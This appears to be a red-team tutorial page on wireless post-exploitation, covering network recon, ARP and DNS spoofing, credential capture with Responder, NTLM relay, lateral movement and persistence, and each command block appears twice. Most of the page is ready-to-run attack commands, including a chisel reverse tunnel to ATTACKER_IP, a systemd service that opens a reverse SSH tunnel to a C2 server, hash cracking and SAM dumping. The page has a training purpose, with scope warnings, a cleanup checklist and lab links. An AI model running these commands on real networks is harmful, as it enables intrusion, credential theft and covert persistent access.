Wireless Post-Exploitation
Post-Exploitation
🔥 Advanced
T1557 | Adversary-in-the-Middle T1021 | Remote Services T1040 | Network Sniffing Cracking a WiFi password is only the beginning. This guide covers what to do after gaining wireless network access — pivoting into the internal network, intercepting traffic, relaying credentials, and moving laterally from the wireless segment into wired infrastructure.
Scope Check
Post-exploitation activities can rapidly expand beyond the original scope.
Ensure your Rules of Engagement explicitly authorize internal network testing,
credential capture, and lateral movement before proceeding.
Prerequisites
- • Successfully connected to the target wireless network (WPA key cracked)
- • IP address obtained via DHCP or static assignment
- •
nmap,responder,bettercap, andimpacketinstalled - • Understanding of ARP, DNS, and NTLM relay concepts
📑 Table of Contents
Network Reconnaissance
Once connected to the wireless network, the first step is mapping the internal network — identify the subnet, gateway, DNS servers, and all reachable hosts and services.
bash
# Check your assigned IP and gateway
ip addr show wlan0
ip route show
# Identify the subnet and DNS
cat /etc/resolv.conf
# Quick host discovery (ARP scan — fastest, subnet only)
sudo arp-scan --interface=wlan0 --localnet
# Nmap host discovery + common port scan
nmap -sn 192.168.1.0/24 -oA discovery
nmap -sV -sC --top-ports 100 192.168.1.0/24 -oA initial_scan
# Identify the domain controller (if AD environment)
nmap -p 88,389,636,445,53 192.168.1.0/24 --open -oG dc_scan.txt
# Check for network shares
smbclient -L //192.168.1.1 -N
crackmapexec smb 192.168.1.0/24 --shares# Check your assigned IP and gateway
ip addr show wlan0
ip route show
# Identify the subnet and DNS
cat /etc/resolv.conf
# Quick host discovery (ARP scan — fastest, subnet only)
sudo arp-scan --interface=wlan0 --localnet
# Nmap host discovery + common port scan
nmap -sn 192.168.1.0/24 -oA discovery
nmap -sV -sC --top-ports 100 192.168.1.0/24 -oA initial_scan
# Identify the domain controller (if AD environment)
nmap -p 88,389,636,445,53 192.168.1.0/24 --open -oG dc_scan.txt
# Check for network shares
smbclient -L //192.168.1.1 -N
crackmapexec smb 192.168.1.0/24 --sharesWireless vs. Wired Segmentation
Many organizations place wireless clients on a separate VLAN. Check if you can reach the
wired corporate network. If the wireless VLAN is isolated, you may need to pivot through a
dual-homed host (e.g., a wireless printer that's also on the wired network).
ARP Spoofing & MITM
ARP spoofing positions you as a man-in-the-middle between the target and the gateway, allowing you to intercept, modify, or redirect all network traffic on the wireless segment.
bash
# Method 1: Bettercap (recommended — handles forwarding automatically)
sudo bettercap -iface wlan0
# Inside bettercap:
> net.probe on # Discover hosts
> net.show # List discovered hosts
> set arp.spoof.targets 192.168.1.50 # Target specific host
> arp.spoof on # Start ARP poisoning
> net.sniff on # Capture traffic
# Method 2: arpspoof + IP forwarding (manual)
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlan0 -t 192.168.1.50 -r 192.168.1.1
# Method 3: Ettercap (GUI available)
sudo ettercap -T -M arp:remote /192.168.1.50// /192.168.1.1//# Method 1: Bettercap (recommended — handles forwarding automatically)
sudo bettercap -iface wlan0
# Inside bettercap:
> net.probe on # Discover hosts
> net.show # List discovered hosts
> set arp.spoof.targets 192.168.1.50 # Target specific host
> arp.spoof on # Start ARP poisoning
> net.sniff on # Capture traffic
# Method 2: arpspoof + IP forwarding (manual)
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlan0 -t 192.168.1.50 -r 192.168.1.1
# Method 3: Ettercap (GUI available)
sudo ettercap -T -M arp:remote /192.168.1.50// /192.168.1.1//⚠️ ARP Spoofing Detection
Modern switches and network monitoring tools (DHCP snooping, Dynamic ARP Inspection) can detect and block ARP spoofing. Wireless networks are more vulnerable since all clients share the broadcast domain. Check for DAI before assuming success.
Credential Sniffing
With MITM position established, capture credentials from unencrypted protocols and downgraded connections. Even HTTPS can be stripped in some configurations.
bash
# Bettercap with HTTP proxy and credential sniffing
sudo bettercap -iface wlan0
> set arp.spoof.targets 192.168.1.0/24
> arp.spoof on
> set net.sniff.verbose true
> set net.sniff.output captured.pcap
> net.sniff on
# Capture HTTP credentials (unencrypted forms/Basic auth)
# Bettercap logs them automatically when sniffing
# Responder — poison LLMNR/NBT-NS/mDNS to capture NTLMv2 hashes
sudo responder -I wlan0 -wrf
# Check captured hashes
cat /usr/share/responder/logs/*.txt
# Crack captured NTLMv2 hashes
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt# Bettercap with HTTP proxy and credential sniffing
sudo bettercap -iface wlan0
> set arp.spoof.targets 192.168.1.0/24
> arp.spoof on
> set net.sniff.verbose true
> set net.sniff.output captured.pcap
> net.sniff on
# Capture HTTP credentials (unencrypted forms/Basic auth)
# Bettercap logs them automatically when sniffing
# Responder — poison LLMNR/NBT-NS/mDNS to capture NTLMv2 hashes
sudo responder -I wlan0 -wrf
# Check captured hashes
cat /usr/share/responder/logs/*.txt
# Crack captured NTLMv2 hashes
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txtResponder on Wireless
Responder is extremely effective on wireless segments because clients often broadcast
LLMNR/NBT-NS queries for printers, file shares, and intranet sites. A wireless attacker
in the same broadcast domain can poison these queries without any ARP spoofing needed.
DNS Spoofing
Redirect DNS queries to serve phishing pages, capture credentials, or redirect traffic to attacker-controlled infrastructure.
bash
# Bettercap DNS spoofing (requires ARP spoof active)
sudo bettercap -iface wlan0
> set dns.spoof.domains intranet.corp.local, portal.corp.local
> set dns.spoof.address 192.168.1.200 # Your IP
> dns.spoof on
# Host a credential harvesting page
# (use with authorization only — phishing assessment)
python3 -m http.server 80 # Serve your phishing page
# Alternative: dnschef (standalone DNS proxy)
sudo dnschef --fakedomains=intranet.corp.local --fakeip=192.168.1.200 -i 0.0.0.0# Bettercap DNS spoofing (requires ARP spoof active)
sudo bettercap -iface wlan0
> set dns.spoof.domains intranet.corp.local, portal.corp.local
> set dns.spoof.address 192.168.1.200 # Your IP
> dns.spoof on
# Host a credential harvesting page
# (use with authorization only — phishing assessment)
python3 -m http.server 80 # Serve your phishing page
# Alternative: dnschef (standalone DNS proxy)
sudo dnschef --fakedomains=intranet.corp.local --fakeip=192.168.1.200 -i 0.0.0.0NTLM Relay from WiFi
If the wireless segment has visibility to Active Directory services, captured NTLM authentication attempts can be relayed to other hosts to gain access without cracking the password.
bash
# Step 1: Identify SMB targets that don't require signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt
# Step 2: Start ntlmrelayx (Impacket)
# Relay captured NTLM auth to targets and dump SAM
sudo ntlmrelayx.py -tf targets.txt -smb2support
# Step 3: Trigger authentication
# Option A: Responder (LLMNR/NBT-NS poisoning)
sudo responder -I wlan0 -wrf --disable-ess
# Option B: Force auth via captured credentials or file share link
# Create an SCF/URL file on a writable share that triggers auth
# Step 4: Check ntlmrelayx output for:
# - SAM dumps (local admin hashes)
# - Secretsdump output
# - Command execution results
# Advanced: Relay to LDAP for AD takeover
sudo ntlmrelayx.py -t ldap://DC_IP --delegate-access# Step 1: Identify SMB targets that don't require signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt
# Step 2: Start ntlmrelayx (Impacket)
# Relay captured NTLM auth to targets and dump SAM
sudo ntlmrelayx.py -tf targets.txt -smb2support
# Step 3: Trigger authentication
# Option A: Responder (LLMNR/NBT-NS poisoning)
sudo responder -I wlan0 -wrf --disable-ess
# Option B: Force auth via captured credentials or file share link
# Create an SCF/URL file on a writable share that triggers auth
# Step 4: Check ntlmrelayx output for:
# - SAM dumps (local admin hashes)
# - Secretsdump output
# - Command execution results
# Advanced: Relay to LDAP for AD takeover
sudo ntlmrelayx.py -t ldap://DC_IP --delegate-accessSMB Signing
NTLM relay attacks fail against hosts with SMB signing required. Domain controllers
enforce signing by default. Focus relay attacks on workstations and member servers.
Check with:
crackmapexec smb TARGET --gen-relay-list Lateral Movement
Move from the wireless segment into wired infrastructure using captured credentials or relay-obtained access.
bash
# With captured credentials — check access scope
crackmapexec smb 192.168.1.0/24 -u 'user' -p 'password' --shares
# WinRM access (if port 5985 open)
evil-winrm -i 192.168.1.50 -u 'user' -p 'password'
# PsExec via Impacket
psexec.py 'DOMAIN/user:password@192.168.1.50'
# SSH pivoting through a compromised host to reach wired VLANs
ssh -D 9050 user@192.168.1.50 # SOCKS proxy
proxychains nmap -sT -p 445,3389 10.0.0.0/24
# Chisel tunnel (if SSH unavailable)
# On attacker: chisel server -p 8080 --reverse
# On target: chisel client ATTACKER_IP:8080 R:socks# With captured credentials — check access scope
crackmapexec smb 192.168.1.0/24 -u 'user' -p 'password' --shares
# WinRM access (if port 5985 open)
evil-winrm -i 192.168.1.50 -u 'user' -p 'password'
# PsExec via Impacket
psexec.py 'DOMAIN/user:password@192.168.1.50'
# SSH pivoting through a compromised host to reach wired VLANs
ssh -D 9050 user@192.168.1.50 # SOCKS proxy
proxychains nmap -sT -p 445,3389 10.0.0.0/24
# Chisel tunnel (if SSH unavailable)
# On attacker: chisel server -p 8080 --reverse
# On target: chisel client ATTACKER_IP:8080 R:socks| Pivot Scenario | Technique | Tool |
|---|---|---|
| WiFi → wired via dual-homed host | SSH/SOCKS proxy through compromised printer or thin client | ssh -D / chisel |
| WiFi → AD domain controller | NTLM relay to LDAP or Kerberos attack | ntlmrelayx / impacket |
| Guest WiFi → corporate | Scan for misconfigured firewall rules between VLANs | nmap / traceroute |
| IoT VLAN → management | Compromise IoT device, use as network pivot | metasploit / ligolo |
Wireless Persistence
Maintaining access after initial compromise — useful for red team engagements with multi-day operational windows.
bash
# Option 1: Deploy a rogue AP as persistent backdoor
# Use a small device (Raspberry Pi / GL.iNet) configured to:
# - Connect to target WiFi as a client
# - Create a reverse SSH tunnel to C2
# - Bridge or NAT traffic for remote access
# Auto-connect and tunnel on boot (systemd service)
# /etc/systemd/system/wifi-tunnel.service
# [Service]
# ExecStart=/usr/bin/ssh -N -R 2222:localhost:22 c2@YOUR_SERVER -o StrictHostKeyChecking=no
# Restart=always
# Option 2: WPA-Enterprise certificate persistence
# If you've compromised the RADIUS server or CA:
# - Issue legitimate client certificates
# - Connect with valid 802.1X credentials
# Option 3: Pre-shared key access
# The cracked WPA2 key provides persistent access until changed
# Monitor for SSID password changes:
airodump-ng wlan0mon --wps --write monitoring# Option 1: Deploy a rogue AP as persistent backdoor
# Use a small device (Raspberry Pi / GL.iNet) configured to:
# - Connect to target WiFi as a client
# - Create a reverse SSH tunnel to C2
# - Bridge or NAT traffic for remote access
# Auto-connect and tunnel on boot (systemd service)
# /etc/systemd/system/wifi-tunnel.service
# [Service]
# ExecStart=/usr/bin/ssh -N -R 2222:localhost:22 c2@YOUR_SERVER -o StrictHostKeyChecking=no
# Restart=always
# Option 2: WPA-Enterprise certificate persistence
# If you've compromised the RADIUS server or CA:
# - Issue legitimate client certificates
# - Connect with valid 802.1X credentials
# Option 3: Pre-shared key access
# The cracked WPA2 key provides persistent access until changed
# Monitor for SSID password changes:
airodump-ng wlan0mon --wps --write monitoringRed Team Consideration
For long-duration engagements, a small wireless implant (Raspberry Pi Zero W or
GL.iNet travel router) hidden near the target and connected to their WiFi provides
a reliable physical backdoor with remote access via reverse tunnel.
Cleanup & Reporting
Properly clean up after post-exploitation activities and document findings for the report.
✅ Cleanup Checklist
- • Stop all ARP spoofing and restore ARP tables
- • Terminate Responder and DNS spoofing
- • Remove implants and rogue APs
- • Delete dropped files from compromised hosts
- • Flush IP forwarding rules
- • Disconnect from target wireless network
📝 Report Findings
- • WiFi key cracked → time to crack, method used
- • Network segmentation gaps (WiFi → wired access)
- • Credentials captured via LLMNR/MITM
- • NTLM relay success → hosts compromised
- • Lateral movement path to sensitive systems
- • Recommended mitigations per finding
bash
# Restore ARP tables (stop bettercap gracefully)
# bettercap: arp.spoof off → exit
# Manual ARP restore
sudo arpspoof -i wlan0 -t 192.168.1.50 -r 192.168.1.1 # Ctrl+C sends restore packets
# Disable IP forwarding
echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward
# Clear iptables rules added during testing
sudo iptables -t nat -F
sudo iptables -F# Restore ARP tables (stop bettercap gracefully)
# bettercap: arp.spoof off → exit
# Manual ARP restore
sudo arpspoof -i wlan0 -t 192.168.1.50 -r 192.168.1.1 # Ctrl+C sends restore packets
# Disable IP forwarding
echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward
# Clear iptables rules added during testing
sudo iptables -t nat -F
sudo iptables -F 🎯
Wireless Post-Exploitation Practice
Practice pivoting from wireless access into internal network exploitation in a safe lab environment.
🔧
Post-Exploitation Pivot Lab Custom Lab hard
ARP spoofingLLMNR poisoningNTLM relaylateral movement
🔧
Internal Network Attack Lab Custom Lab hard
ResponderCrackMapExecbettercap MITMchisel tunneling